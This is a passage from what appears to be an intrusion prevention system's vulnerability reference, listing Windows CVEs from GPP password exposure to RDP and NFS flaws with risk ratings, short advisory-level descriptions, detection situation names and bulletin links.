Windows Group Policy Preferences used to allow credentials to be specified, and the passwords were stored on SYSVOL share, which is accessible by all authenticated users. This allowed an easy elevation of privileges if credentials with administrator privileges were stored.

Situation:

SMB-TCP_CHS-Windows-GPP-Password-Elevation-of-Privilege-Vulnerability-CVE-2014-1812

References:

CVE-2014-1812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1812

Windows-Graphics-Rendering-Engine-BMP-File-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Digital Image Suite

Risk:

Moderate

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

A vulnerability has been discovered in the Graphics Rendering Engine (GRE) component of Microsoft Windows. Specifically this vulnerability is exposed by the Microsoft Windows GDI+ subsystem. An attacker can exploit this vulnerability by enticing a user to open a malicious BMP file, resulting in either a denial of service, or in the injection and execution of arbitrary code with the privileges of the currently logged in user. In a successful attack, arbitrary code is supplied and executed on the vulnerable target host. The behaviour of the target system is dependent on the malicious code. Note that any code executed by the attacker runs with the privileges of the logged in user. In an attack where code execution fails, the target application used to render the BMP will terminate abnormally.

Situation:

File-Binary_Windows-Graphics-Rendering-Engine-BMP-File-Parsing-Integer-Overflow

References:

CVE-2008-3015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3015

BID-31022
http://www.securityfocus.com/bid/31022

MS08-052
http://technet.microsoft.com/security/bulletin/MS08-052

Windows-HTML-Platforms-Security-Feature-Bypass

About this vulnerability:	An attempt to exploit a vulnerability in Windows detected
Risk:	High
First detected in:	sgpkg-ips-1849-5242
Last changed:	sgpkg-ips-1849-5242
Platform:	Windows
Software:	<os>
Type:	Input Validation
Description:	Universal naming convention (UNC) paths, a standardized format for identifying network resources, are often utilized in Windows exploits. They could be used, for example, to bypass Windows URL zone checks and run malicious executable on the victim's machine. This fingerprint detects potentially suspicious HTML elements with UNC paths being used in the place of normal links.
Situation:	File-Text_Windows-HTML-Platforms-Security-Feature-Bypass

Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2022-24502

About this vulnerability:

An attempt to exploit a vulnerability in Windows detected

Risk:

Moderate

First detected in:

sgpkg-ips-1442-5242

Last changed:

sgpkg-ips-1442-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A security feature bypass vulnerability has been reported in Windows HTML Platforms.

Situation:

File-Text_Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2022-24502

References:

CVE-2022-24502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24502

ms22-mar
http://technet.microsoft.com/security/bulletin/ms22-mar

Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2025-21269

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1824-5242

Last changed:

sgpkg-ips-1824-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A security feature bypass vulnerability has been reported in Windows HTML Platforms.

Situation:

File-Text_Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2025-21269
File-Binary_Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2025-21269

References:

CVE-2025-21269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21269

ms25-jan
http://technet.microsoft.com/security/bulletin/ms25-jan

Windows-HTTP.sys-DOS-Vulnerability-CVE-2013-1305

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-523-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows

Situation:

HTTP_CSH-Windows-HTTP.sys-DOS-Vulnerability-CVE-2013-1305

References:

CVE-2013-1305
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1305

MS13-037
http://technet.microsoft.com/security/bulletin/MS13-037

Windows-ICS-DHCP-Buffer-Overflow-CVE-2023-38148

About this vulnerability:

An attempt to exploit a vulnerability in Windows ICS DHCP server detected

Risk:

High

First detected in:

sgpkg-ips-1630-5242

Last changed:

sgpkg-ips-1630-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Windows ICS DHCP server buffer overflow vulnerability.

Situation:

BOOTP_CS-Windows-ICS-DHCP-Buffer-Overflow-CVE-2023-38148

References:

CVE-2023-38148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38148

ms23-sep
http://technet.microsoft.com/security/bulletin/ms23-sep

Windows-Kerberos-Elevation-Of-Privilege-Vulnerability-CVE-2022-33679

About this vulnerability:

An attempt to exploit a vulnerability in Windows Kerberos detected

Risk:

High

First detected in:

sgpkg-ips-1580-5242

Last changed:

sgpkg-ips-1580-5242

Platform:

Windows

Software:

<os>

Type:

Insecure Configuration

Description:

Windows Kerberos Elevation of Privilege Vulnerability.

Situation:

Generic_CS-Windows-Kerberos-Elevation-Of-Privilege-Vulnerability-CVE-2022-33679

References:

CVE-2022-33679
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33679

Windows-Kerberos-Security-Feature-Bypass-CVE-2025-29809

About this vulnerability:

An attempt to exploit a vulnerability in Windows Kerberos detected

Risk:

High

First detected in:

sgpkg-ips-1864-5242

Last changed:

sgpkg-ips-1864-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Windows Kerberos's security feature bypass vulnerability CVE-2025-29809.

Situation:

Generic_UDP-Windows-Kerberos-Security-Feature-Bypass-CVE-2025-29809
Generic_CS-Windows-Kerberos-Security-Feature-Bypass-CVE-2025-29809

References:

CVE-2025-29809
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-29809

ms25-apr
http://technet.microsoft.com/security/bulletin/ms25-apr

Windows-Kernel-cng.sys-Buffer-Overflow-CVE-2020-17087

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1295-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the processing of IOCTL 0x390400 in the Windows Kernel, exposed by the Windows Kernel Cryptography Driver (cng.sys). A successful exploit can lead to privilege escalation, such as sandbox escape.

Situation:

File-Text_Windows-Kernel-cng.sys-Buffer-Overflow-CVE-2020-17087

References:

CVE-2020-17087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17087

Windows-Local-Privilege-Escalation-CVE-2016-0167

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1305-5242

Last changed:

sgpkg-ips-1305-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A privilege escalation exists in older Windows Kernels. An attacker who already has gained remote code execution on the client can utilize this vulnerability to elevate privileges.

Situation:

File-Exe_Windows-Local-Privilege-Escalation-CVE-2016-0167

References:

CVE-2016-0167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0167

Windows-Malware-Filename

About this vulnerability:	Windows Malware Filename
Risk:	High
First detected in:	sgpkg-ips-124-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Insecure Configuration
Description:	Certain filenames are commonly associated with malware. Detecting malware by filename is not always reliable, as names can change, but many types of malware always use a specific unique name that allows the detection of the malware. Access to such filenames might mean that a remote compromise has occurred, or that someone is trying to remotely compromise the system. False alerts are also possible.
Situation:	SMB-TCP_CHS-Malware-Filename-Access

Windows-Mark-Of-The-Web-Bypass-CVE-2024-38213

About this vulnerability:

An attempt to exploit a vulnerability in Windows detected

Risk:

High

First detected in:

sgpkg-ips-1829-5242

Last changed:

sgpkg-ips-1829-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

CVE-2024-38213 is a bypass for Windows' Mark-of-the-Web protection. Before Microsoft's June 2024 security patch, files that are copied and pasted from WebDAV shares did not receive the Mark-of-the-Web designations. As a result, those files could subsequently be opened without the protections of Windows Defender SmartScreen or Microsoft Office Protected View.

Situation:

File-Text_Suspicious-MS-Search-URI-Scheme-Link-In-HTML

References:

CVE-2024-38213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38213

Windows-Mark-Of-The-Web-Security-Feature-Bypass-CVE-2025-24061

About this vulnerability:

A vulnerability in Windows

Risk:

High

First detected in:

sgpkg-ips-1847-5242

Last changed:

sgpkg-ips-1864-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Windows Mark-of-the-Web (MotW) security feature bypass vulnerability CVE-2025-24061.

Situation:

File-Binary_Windows-Mark-Of-The-Web-Security-Feature-Bypass-CVE-2025-24061

References:

CVE-2025-24061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24061

ms25-mar
http://technet.microsoft.com/security/bulletin/ms25-mar

Windows-Media-Center-RCE-CVE-2015-6127

About this vulnerability:

An attempt to exploit a vulnerability in Windows Media Center Detected

Risk:

Moderate

First detected in:

sgpkg-ips-711-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Insecure Configuration

Description:

An attempt to exploit a vulnerability in Windows Media Center Detected

Situation:

File-Text_Windows-Media-Center-RCE-CVE-2015-6127

References:

CVE-2015-6127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6127

MS15-134
http://technet.microsoft.com/security/bulletin/MS15-134

Windows-Media-Center-RCE-CVE-2015-6131

About this vulnerability:

An attempt to exploit a vulnerability in Windows Media Center Detected

Risk:

Moderate

First detected in:

sgpkg-ips-711-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Insecure Configuration

Description:

An attempt to exploit a vulnerability in Windows Media Center Detected

Situation:

File-Text_Windows-Media-Center-RCE-CVE-2015-6131

References:

CVE-2015-6131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6131

MS15-134
http://technet.microsoft.com/security/bulletin/MS15-134

Windows-Media-Decompression-Vulnerability-CVE-2013-0077

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-509-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows

Situation:

File-MPEG_Windows-Media-Decompression-Vulnerability-CVE-2013-0077

References:

CVE-2013-0077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0077

MS13-011
http://technet.microsoft.com/security/bulletin/MS13-011

Windows-Media-HTTP-Stream-Download

About this vulnerability:	Windows Media HTTP stream download
Risk:	Low
First detected in:	sgpkg-ips-173-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Windows Media Player
Type:	Insecure Configuration
Description:	Windows Media Player is an application that is able to play video and audio files and streams. This includes streaming media over HTTP protocol.
Situation:	HTTP_SS-Windows-Media-HTTP-Stream File-Binary_Windows-Media-HTTP-Stream

Windows-Media-Player-CVE-2017-0042

About this vulnerability:

A vulnerability in Windows Media Player

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Windows Media Player

Situation:

File-Text_Windows-Media-Player-CVE-2017-0042
File-RTF_Microsoft-Windows-CVE-2017-0042

References:

CVE-2017-0042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0042

MS17-015
http://technet.microsoft.com/security/bulletin/MS17-015

Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818

About this vulnerability:

A remote code execution vulnerability in Windows Media Player

Risk:

Critical

First detected in:

sgpkg-ips-340-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Media Player

Type:

Malfunction

Description:

There is a remote code execution vulnerability in Windows Media Player.

Situation:

E-Mail_BS-Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818
HTTP_SS-Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818
File-Binary_Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818

References:

CVE-2010-0818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0818

MS10-062
http://technet.microsoft.com/security/bulletin/MS10-062

Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525

About this vulnerability:

A heap corruption vulnerability in Windows Media Runtime

Risk:

High

First detected in:

sgpkg-ips-257-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Media Format Runtime; Windows Media Player

Type:

Malfunction

Description:

There is a heap corruption vulnerability in the Microsoft Windows Media Format processing engine. By enticing a target user to open a crafted ASF file with a vulnerable version of the affected software, a remote attacker can execute non-privileged arbitrary code.

Situation:

E-Mail_BS-Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525
HTTP_SS-Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525
File-Binary_Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525

References:

CVE-2009-2525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2525

MS09-051
http://technet.microsoft.com/security/bulletin/MS09-051

Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555

About this vulnerability:

A code execution vulnerability in Windows Media Runtime

Risk:

High

First detected in:

sgpkg-ips-257-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Media Format Runtime; Windows Media Player

Type:

Malfunction

Description:

There is a code execution vulnerability in the Microsoft Windows Media Format processing engine. By enticing a target user to open a crafted ASF file with a vulnerable version of Windows Media Player, a remote attacker is able to overrun a heap buffer, which can lead to non-privileged arbitrary code execution.

Situation:

E-Mail_BS-Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555
HTTP_SS-Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555
File-Binary_Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555

References:

CVE-2009-0555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0555

MS09-051
http://technet.microsoft.com/security/bulletin/MS09-051

Windows-Media-Services-MX_STATS_LogLine-NSIISlog-DLL-BOF

About this vulnerability:

Buffer overflow in MS Windows Media Services NSIISlog.dll extension

Risk:

High

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT 4.0; Windows 2000

Software:

Windows Media Services

Type:

Buffer Overflow

Description:

Microsoft Windows 2000 and NT 4.0 Server are vulnerable to a stack-based buffer overflow in the ISAPI (Internet Services Application Programming Interface) nsiislog.dll extension of the Internet Information Services (IIS) Scripts directory. If the server is configured for Windows Media Services, a remote attacker could send a POST request containtng an overly large MX_STATS_LogLine header field to the server to overflow a buffer and cause a Denial of Service (DoS) or execute arbitrary code on the system.

Situation:

HTTP_CS-Windows-Media-Services-MX-STATS-LogLine-NSIISlog-DLL-BOF

References:

BID-9878
http://www.securityfocus.com/bid/9878

Windows-Media-Services-NSIISlog-DLL-BOF

About this vulnerability:

Buffer overflow in MS Windows Media Services NSIISlog.dll extension

Risk:

High

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS; Windows Media Services

Type:

Buffer Overflow

Description:

Microsoft Windows 2000 and NT 4.0 Server are vulnerable to a stack-based buffer overflow in the ISAPI (Internet Services Application Programming Interface) nsiislog.dll extension of the Internet Information Services (IIS) Scripts directory. If the server is configured for Windows Media Services, a remote attacker could send an overly large POST request to the server to overflow a buffer and cause a Denial of Service (DoS) or execute arbitrary code on the system.

Situation:

HTTP_CS-Windows-Media-Services-NSIISlog-DLL-BOF

References:

CVE-2003-0349
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0349

BID-8035
http://www.securityfocus.com/bid/8035

OSVDB-4535
http://www.osvdb.org/4535

MS03-022
http://technet.microsoft.com/security/bulletin/MS03-022

Windows-Memory-Disclosure-CVE-2017-0038

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-856-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A heap-based out-of-bounds vulnerability exists in Microsoft Windows. A successful exploit could lead to memory disclosure.

Situation:

File-Binary_Windows-Memory-Disclosure-CVE-2017-0038

References:

CVE-2017-0038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0038

Windows-MFT-File-Name-Crash

About this vulnerability:	A vulnerability in Microsoft Windows
Risk:	High
First detected in:	sgpkg-ips-926-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	There exists a vulnerability in Windows that causes the system to lock up or crash if a site with certain content is accessed. More specifically, a malicious site will contain a path referencing a file called $MFT.
Situation:	File-Text_Windows-MFT-File-Name-Crash

Windows-Mixed-Reality-Developer-Tools-Information-Disclosure

About this vulnerability:

A vulnerability in Windows

Risk:

High

First detected in:

sgpkg-ips-1512-5242

Last changed:

sgpkg-ips-1512-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in Windows Mixed Reality Developer Tools.

Situation:

File-Text_Windows-Mixed-Reality-Developer-Tools-Information-Disclosure

References:

CVE-2022-37974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37974

ms22-oct
http://technet.microsoft.com/security/bulletin/ms22-oct

Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112

About this vulnerability:

A vulnerability in Windows MSHTML Platform

Risk:

High

First detected in:

sgpkg-ips-1752-5242

Last changed:

sgpkg-ips-1776-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A spoofing vulnerability has been reported in the Microsoft MSHTML Platform due to the handling of the mhtml URL prefix. If the URL in an Internet Shortcut file is prefixed with mhtml, clicking it on an unpatched system will cause the link to be opened in Internet Explorer instead of Microsoft Edge.

Situation:

File-Text_Internet-Shortcut-File-MHTML-URL-Prefix
File-Text_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112
File-TextId_Internet-Shortcut-File-MHTML-URL-Prefix
File-TextId_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112

References:

CVE-2024-38112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38112

ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul

Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-43573

About this vulnerability:

A vulnerability in Windows MSHTML Platform

Risk:

Moderate

First detected in:

sgpkg-ips-1787-5242

Last changed:

sgpkg-ips-1787-5242

Platform:

Windows

Software:

Internet Explorer; Microsoft Edge

Type:

Malfunction

Description:

A spoofing vulnerability has been reported in the Microsoft MSHTML Platform.

Situation:

File-Text_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-43573
File-PDF_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-43573

References:

CVE-2024-43573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43573

ms24-oct
http://technet.microsoft.com/security/bulletin/ms24-oct

Windows-MSRPC-SRVSVC-Unicode-Buffer-Overflow

About this vulnerability:

Microsoft Windows MSRPC Server Service buffer overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-177-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

The Microsoft Windows Server Service suffers from a buffer overflow vulnerability. A malicious request to the service can be used to cause buffer overflow, which can be used to execute arbitrary code on the vulnerable host.

Situation:

MSRPC-TCP_CPS-Microsoft-Windows-CVE-2008-4250-Exploit-Shellcode
MSRPC-TCP_CPS-Windows-MSRPC-SRVSVC-Unicode-Buffer-Overflow
MSRPC-TCP_CPS-Vulnerable-Microsoft-Windows-Server-Service-Function-Called-2
MSRPC-TCP_CPS-Microsoft-Windows-Server-Service-NetPathCompare-Buffer-Overrun
MSRPC-TCP_CPS-Microsoft-Windows-WKSSVC-Path-Memory-Corruption

References:

CVE-2008-4250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

BID-31874
http://www.securityfocus.com/bid/31874

MS08-067
http://technet.microsoft.com/security/bulletin/MS08-067

Windows-Network-File-System-Remote-Code-Execution-Vulnerability-CVE-2023-24941

About this vulnerability:

An attempt to exploit a vulnerability in Windows detected

Risk:

High

First detected in:

sgpkg-ips-1597-5242

Last changed:

sgpkg-ips-1600-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A remote codes execution vulnerability has been reported in Microsoft Network File System. The vulnerability is triggered when handling incoming NFSv4.1 call. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted call to the victim Network File System service. Successful exploitation of this vulnerability can result in remote code execution.

Situation:

Generic_CS-Windows-Network-File-System-Remote-Code-Execution-Vulnerability-CVE-2023-24941

References:

CVE-2023-24941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24941

ms23-may
http://technet.microsoft.com/security/bulletin/ms23-may

Windows-NFS-Service-RCE-CVE-2022-24491

About this vulnerability:

CVE-2022-24491 in Windows NFS

Risk:

High

First detected in:

sgpkg-ips-1454-5242

Last changed:

sgpkg-ips-1462-5242

Platform:

Windows

Software:

RPC

Type:

Buffer Overflow

Description:

A vulnerability exists in Windows NFS service.

Situation:

Generic_UDP-Windows-NFS-CVE-2022-24491
SunRPC_TCP-Windows-NFS-CVE-2022-24491

References:

CVE-2022-24491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24491

ms22-apr
http://technet.microsoft.com/security/bulletin/ms22-apr

Windows-NFS-Service-RCE-CVE-2022-24497

About this vulnerability:

CVE-2022-24497 in Windows NFS

Risk:

High

First detected in:

sgpkg-ips-1454-5242

Last changed:

sgpkg-ips-1462-5242

Platform:

Windows

Software:

RPC

Type:

Buffer Overflow

Description:

A vulnerability exists in Windows NFS service.

Situation:

Generic_UDP-Windows-NFS-CVE-2022-24497
SunRPC_TCP-Windows-NFS-CVE-2022-24497

References:

CVE-2022-24497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24497

ms22-apr
http://technet.microsoft.com/security/bulletin/ms22-apr

Windows-Null-Session

About this vulnerability:	Windows Null Session
Risk:	High
First detected in:	sgpkg-ips-124-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Insecure Configuration
Description:	A Windows null session is a remote logon to a windows host without using any username or password. Null session allows the remote intruder to gather a lot of information of the target systems, disclosing any potential vulnerabilities. The null session also allows the attacker to exploit these vulnerabilities, which could lead to remote compromise of the target system. The null session is mandatory for some windows services and completely disallowing it may lead to connectivity problems in various networking services. For this reason, it is not advisable to completely prevent null sessions within the organization's internal networks, but it is recommended to block null sessions in the network borders. In SGIPS there are null session-related situations that aim to cut the dangerous parts of the null sessions away. These situations can be deployed in drop mode even in the middle of an organization network. Because Null session is important in windows environments, sometimes even partial blocking of the null sessions might cause problems.
Situation:	SMB-TCP_CHS-Null-Session-Samr-Access

Windows-OLE-Automation-For-VBScript-Scripting-Engine-CVE-2016-3375

About this vulnerability:

A vulnerability in Windows

Risk:

Moderate

First detected in:

sgpkg-ips-800-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A vulnerability in Windows

Situation:

File-Text_Windows-OLE-Automation-For-VBScript-Scripting-Engine-CVE-2016-3375

References:

CVE-2016-3375
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3375

MS16-116
http://technet.microsoft.com/security/bulletin/MS16-116

Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325

About this vulnerability:

A vulnerability in Microsoft Outlook

Risk:

High

First detected in:

sgpkg-ips-1585-5242

Last changed:

sgpkg-ips-1626-5242

Platform:

Windows

Software:

Microsoft Outlook

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Microsoft Outlook.

Situation:

File-Binary_Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325
File-OLE_Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325
File-RTF_Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325

References:

CVE-2023-29325
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29325

ms23-may
http://technet.microsoft.com/security/bulletin/ms23-may

Windows-Out-Of-Bounds-Vulnerability-CVE-2017-11906

About this vulnerability:

An Out-Of-Bounds read vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1025-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An Out-Of-Bounds read vulnerability in Microsoft Windows. Successful exploitation of the vulnerability may lead to information disclosure.

Situation:

File-Text_Windows-Out-Of-Bounds-Vulnerability-Poc

References:

CVE-2017-11906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11906

Windows-PDF-Information-Disclosure-CVE-2016-3201

About this vulnerability:

A vulnerability in Windows

Risk:

High

First detected in:

sgpkg-ips-770-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 8.1; Windows 2012; Windows 10.0; Windows 10.1511

Software:

<os>

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Windows.

Situation:

File-PDF_Windows-PDF-Information-Disclosure-CVE-2016-3201

References:

CVE-2016-3201
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3201

MS16-080
http://technet.microsoft.com/security/bulletin/MS16-080

Windows-PDF-Information-Disclosure-CVE-2016-3215

About this vulnerability:

A vulnerability in Windows

Risk:

High

First detected in:

sgpkg-ips-770-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 8.1; Windows 2012; Windows 10.1511

Software:

<os>

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Windows.

Situation:

File-PDF_Windows-PDF-Information-Disclosure-CVE-2016-3215

References:

CVE-2016-3215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3215

MS16-080
http://technet.microsoft.com/security/bulletin/MS16-080

Windows-PDF-Library-CVE-2016-3370

About this vulnerability:

A vulnerability in Windows

Risk:

Moderate

First detected in:

sgpkg-ips-800-5242

Last changed:

sgpkg-ips-1788-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An information disclosure vulnerability in Windows PDF Library.

Situation:

File-PDF_Windows-PDF-Library-CVE-2016-3370

References:

CVE-2016-3370
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3370

MS16-115
http://technet.microsoft.com/security/bulletin/MS16-115

Windows-PDF-Remote-Code-Execution-CVE-2016-3203

About this vulnerability:

A vulnerability in Windows

Risk:

High

First detected in:

sgpkg-ips-770-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 8.1; Windows 2012; Windows 10.0; Windows 10.1511

Software:

Microsoft Edge; Windows Server

Type:

Input Validation

Description:

A vulnerability in Microsoft Edge, and Microsoft Windows, versions 10, 10 Version 1511, 8.1, 2012, 2012 R2, which allows remote attackers to execute arbitrary code via a crafted PDF file, due to the improper validation of the crypt filter object Length entries.

Situation:

File-PDF_Windows-PDF-Remote-Code-Execution-CVE-2016-3203
File-PDF_Microsoft-Windows-PDF-Library-Code-Execution

References:

CVE-2016-3203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3203

MS16-080
http://technet.microsoft.com/security/bulletin/MS16-080

Windows-RDP-Client-Information-Disclosure-Vulnerability-CVE-2019-1108

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1175-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Windows

Situation:

File-Exe_Windows-Remote-Desktop-Protocol-Client-Information-Disclosure-Vulnerability-CVE-2019-1108

References:

CVE-2019-1108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1108

Windows-RDP-Information-Disclosure-Vulnerability-CVE-2020-16896

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Critical

First detected in:

sgpkg-ips-1287-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An information disclosure vulnerability exists in Remote Desktop Protocol. A successful exploitation of this vulnerability can lead to information disclosure.

Situation:

Generic_CS-Windows-RDP-Information-Disclosure-Vulnerability-CVE-2020-16896

References:

CVE-2020-16896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16896

ms20-oct
http://technet.microsoft.com/security/bulletin/ms20-oct

Windows-RDP-Remote-Code-Execution-CVE-2019-0708

About this vulnerability:

A vulnerability in the Windows RDP service.

Risk:

Moderate

First detected in:

sgpkg-ips-1161-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A remote code execution vulnerability exists in Remote Desktop Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system.

Situation:

Generic_CS-Windows-RDP-CVE-2019-0708

References:

CVE-2019-0708
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0708

Windows-Remote-Desktop-Licensing-Service-Information-Disclosure-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

Moderate

First detected in:

sgpkg-ips-1842-5242

Last changed:

sgpkg-ips-1842-5242

Platform:

Windows

Software:

<os>

Type:

Directory Traversal

Description:

Improper validation of messages sent to the Remote Desktop Licensing service causes a vulnerability in Windows. A successful exploitation allows an attacker to gain access to information on the target system.

Situation:

